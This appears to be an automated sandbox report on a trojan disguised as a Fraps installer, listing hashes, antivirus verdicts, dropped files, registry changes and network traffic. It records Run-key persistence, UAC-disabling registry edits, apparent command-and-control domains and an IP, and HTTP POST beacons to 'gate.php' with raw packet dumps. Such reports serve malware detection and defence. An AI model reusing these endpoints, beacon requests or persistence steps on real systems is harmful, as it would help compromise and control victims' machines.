Analysis Date2014-12-17 00:35:05
MD56936c368153a14671e318b13a289eded
SHA1af3c74d772ec0dd13474c6fb7247dd982742e708

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e50f4a1111bafdc813b1f7ec153b8ea9 sha1: d76ecf708f8d7fa01b6b2b67d87d5f51c3cdbd48 size: 23552
Section.rdata md5: 640f709ec19b4ed0455a4c64e5934d5e sha1: d6d6f4b1df06241f6513312657979c184006a044 size: 4608
Section.data md5: 54c75104a38a6f79dc7a8d3b020a9139 sha1: 27a00068376a93d3d30f81f065267042898dfdbb size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 0019d9ffcbdd2ae8a095dcdcaa340d5f sha1: 15e2cb46cdb4d42078cafc6924e1762e63409a7f size: 10752
Timestamp2014-05-11 20:03:30
VersionLegalCopyright: Copyright © Beepa Pty Ltd 2013
FileVersion: 3.5.99.15619
CompanyName: Beepa Pty Ltd
ProductName: FRAPS
ProductVersion: 6.0.0.9
FileDescription: Fraps Installer
PackerNullsoft PiMP Stub -> SFX
PEhash2b74490cfd8311f0f1d022b55b2f2354545edbd8
IMPhashe160ef8e55bb9d162da4e266afd9eef3
AV360 Safeno_virus
AVAd-AwareTrojan.Nsis.Androm.3:Trojan.GenericKD.1973604
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.GenericKD.1973604
AVAuthentiumW32/Trojan.WQXR-5953
AVAvira (antivir)TR/ATRAPS.A.2058
AVBullGuardTrojan.Nsis.Androm.3:Trojan.GenericKD.1973604
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Nsis.Androm.3:Trojan.GenericKD.1973604
AVEset (nod32)Win32/Injector.BPJF
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)Inject2.BEGR
AVIkarusTrojan.ATRAPS
AVK7Unwanted-Program ( 004a8e8a1 )
AVKasperskyTrojan-Ransom.Win32.Aura.ba
AVMalwareBytesTrojan.Inject
AVMcafeeRDN/Generic.dx!dgz
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Trojan.Nsis.Androm.3[ZP]
AVRisingno_virus
AVSophosTroj/Agent-AKBE
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\superannuations\tsetse.s
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\tsetse.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsi1.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\tsetse.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp
Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\msiexec.exe
Creates ProcessC:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\4033585203 ➝
C:\Documents and Settings\All Users\msrhmucm.exe\\x00
RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\advanced\ShowSuperHidden ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system\EnableLUA ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝
NULL
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSdeadliestcatch.in
Winsock DNSbaggindope.su
Winsock DNSoghgahloasdfuiaouif.com
Winsock DNSurastinkycoondky.com
Winsock DNSqwertechy.in
Winsock DNSlkasflkafg.com
Winsock DNSshitserver001.biz

Process
↳ C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\Explorer.EXE

Network Details:

DNSupdate.microsoft.com.nsatc.net
Type: A
65.54.51.250
DNSupdate.microsoft.com.nsatc.net
Type: A
65.55.138.126
DNSqwertechy.in
Type: A
5.149.251.132
DNSdeadliestcatch.in
Type: A
5.149.251.132
DNSshitserver001.biz
Type: A
5.149.251.132
DNSupdate.microsoft.com
Type: A
DNSurastinkycoondky.com
Type: A
DNSlkasflkafg.com
Type: A
DNSoghgahloasdfuiaouif.com
Type: A
DNSbaggindope.su
Type: A
HTTP POSThttp://qwertechy.in/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://deadliestcatch.in/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://shitserver001.biz/and/gate.php
User-Agent: Mozilla/4.0
Flows UDP192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1037 ➝ 65.54.51.250:80
Flows UDP192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1039 ➝ 5.149.251.132:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1041 ➝ 5.149.251.132:80
Flows UDP192.168.1.1:1042 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1043 ➝ 5.149.251.132:80
Flows UDP192.168.1.1:1044 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1045 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1046 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1047 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1048 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1049 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1050 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1051 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   71776572 74656368 792e696e 0d0a436f   qwertechy.in..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 556c424e 486e2b4d   nnO6rdbgUlBNHn+M
0x000000f0 (00240)   70656462 67766e50 6449724d 4f497347   pedbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68574950 6675340a   jV+9m3SjhWIPfu4.
0x00000110 (00272)   4c563631 446b343d 0a                  LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   64656164 6c696573 74636174 63682e69   deadliestcatch.i
0x00000090 (00144)   6e0d0a43 6f6e7465 6e742d4c 656e6774   n..Content-Lengt
0x000000a0 (00160)   683a2037 340d0a43 61636865 2d436f6e   h: 74..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000000d0 (00208)   0d0a0d0a 6b515a66 42574e61 2b4a6461   ....kQZfBWNa+Jda
0x000000e0 (00224)   35583134 486e6e4f 36726462 67556c42   5X14HnnO6rdbgUlB
0x000000f0 (00240)   4e486e2b 4d706564 6267766e 50644972   NHn+MpedbgvnPdIr
0x00000100 (00256)   4d4f4973 476a562b 396d3353 6a685749   MOIsGjV+9m3SjhWI
0x00000110 (00272)   50667534 0a4c5636 31446b34 3d0a       Pfu4.LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   73686974 73657276 65723030 312e6269   shitserver001.bi
0x00000090 (00144)   7a0d0a43 6f6e7465 6e742d4c 656e6774   z..Content-Lengt
0x000000a0 (00160)   683a2037 340d0a43 61636865 2d436f6e   h: 74..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000000d0 (00208)   0d0a0d0a 6b515a66 42574e61 2b4a6461   ....kQZfBWNa+Jda
0x000000e0 (00224)   35583134 486e6e4f 36726462 67556c42   5X14HnnO6rdbgUlB
0x000000f0 (00240)   4e486e2b 4d706564 6267766e 50644972   NHn+MpedbgvnPdIr
0x00000100 (00256)   4d4f4973 476a562b 396d3353 6a685749   MOIsGjV+9m3SjhWI
0x00000110 (00272)   50667534 0a4c5636 31446b34 3d0a       Pfu4.LV61Dk4=.


Strings
 " "0x\
E.
000004e4
3.5.99.15619
6.0.0.9
Beepa Pty Ltd
 Beepa Pty Ltd 2013
CompanyName
Copyright 
FileDescription
FileVersion
FRAPS
Fraps Installer
LegalCopyright
msctls_progress32
MS Shell Dlg
ProductName
ProductVersion
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
*?|<>/":
0&>h6X
\]0ipU
1mwD`vw;
(&?2"vW
30^lJZ
'34L[S
3e?	+:
3y"lsGf5^s
;4E88<
54}mH%
5O4EXe
,7`9{E#
"?/9aq
A4A3:1
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
AppendMenuA
BeginPaint
=B'|>G
b]j9Xg*n
=C:=9-
CallWindowProcA
CCC*CCC
CCCDDDD
CCCoDDD
CCCODDD
CharNextA
CharPrevA
CheckDlgButton
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
_c>_ph
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
>Cv{[\
... %d%%
@.data
D$$+D$
DDD0DDD
DDDADDD
DDD-CCCsDDD
DDD`DDD
DDD DDD
DDD@DDD
DDD+DDD
DDD	DDD`DDD
DDDgDDD
DDDGDDD
DDDjDDD
DDDkDDD
DDDODDD
DDDrDDD
DDDWDDD
DDDXDDD
D$,+D$$P
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
DestroyWindow
DialogBoxParamA
d^IL%7
DispatchMessageA
D$(Ph,
DrawTextA
D$,SPS
E1hc?`
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
Ex3y|"v
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
|('^f{
]FcD?`
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
FreeLibrary
fSrVEP
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
G/,K6%
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
gN'f$2
#h=EkYy
http://nsis.sf.net/NSIS_Error
"*#@]=I|<Aq[
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu`
InvalidateRect
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
I,Uv{4
- "JxI
k75ua	
KERNEL32
KERNEL32.dll
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lvhfhM
MessageBoxIndirectA
\Microsoft\Internet Explorer\Quick Launch
mk,5O6
More information at:
MoveFileA
MoveFileExA
MulDiv
MultiByteToWideChar
.ndata
NSIS Error
~nsu.tmp
NullsoftInstb
NulluN	E
Nybime
ole32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenProcessToken
O(vwu@
^PB2Q/
PeekMessageA
P@&},	gO1TMLS
Pko_{h
/P.Lo]i
po1tK#	
PostQuitMessage
PPPPPP
"*PPqO
	qD{WJ
Q.qc^9
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
RemoveDirectoryA
[Rename]
r+gq}zq
RichEd20
RichEd32
RichEdit
RichEdit20A
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetEnvironmentVariableA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
softuW
Software\Microsoft\Windows\CurrentVersion
SQSSSPW
SystemParametersInfoA
!This program cannot be run in DOS mode.
_^[t	P
TrackPopupMenu
ty-M|9
u49-L7B
USER32.dll
%u.%u%s%s
verifying installer: %d%%
VerQueryValueA
VERSION.dll
v#VhB+@
VW9";j
[W+4t	A
WaitForSingleObject
WriteFile
WritePrivateProfileStringA
wsprintfA
@X16.rN
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b0</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
\xs}5 8@mR
]yALD,
#ZhwY\